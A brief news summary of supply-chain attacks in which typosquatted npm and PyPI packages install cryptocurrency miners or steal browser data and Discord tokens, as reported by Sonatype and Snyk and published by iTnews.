"Malware Floods npm and PyPI Registries in Supply-Chain Attacks"

Sonatype researchers have discovered 186 malicious packages in the npm JavaScript library registry that infect Linux hosts with cryptocurrency mining applications. According to Sonatype, many of the packages published by the same pseudonymous npm account use names such as "r2act" to deceive users of well-known software such as React. In order to retrieve the Monero cryptocurrency mining code from the threat actor's server, the malicious packages download a malicious Bash shell script. Sonatype reported that 55 malicious packages from the Python language PyPI registry had been discovered by another researcher, Hauke Lübbers, and had attempted to download similar cryptocurrency mining scripts from the same server. Snyk discovered 12 malicious PyPI packages from the same author that were intended to compromise Windows hosts. The packages, given names such as "hackerfilelol," would try to download malicious files from the Content Delivery Network (CDN) of the chat application Discord. When executed, the malware would try to steal Google Chrome passwords, cookies, history, and other data, as well as steal Discord tokens and inject a persistent malicious agent into the chat app process. This article continues to discuss the flooding of npm and PyPI registries with malicious packages. 

iTnews reports "Malware Floods npm and PyPI Registries in Supply-Chain Attacks"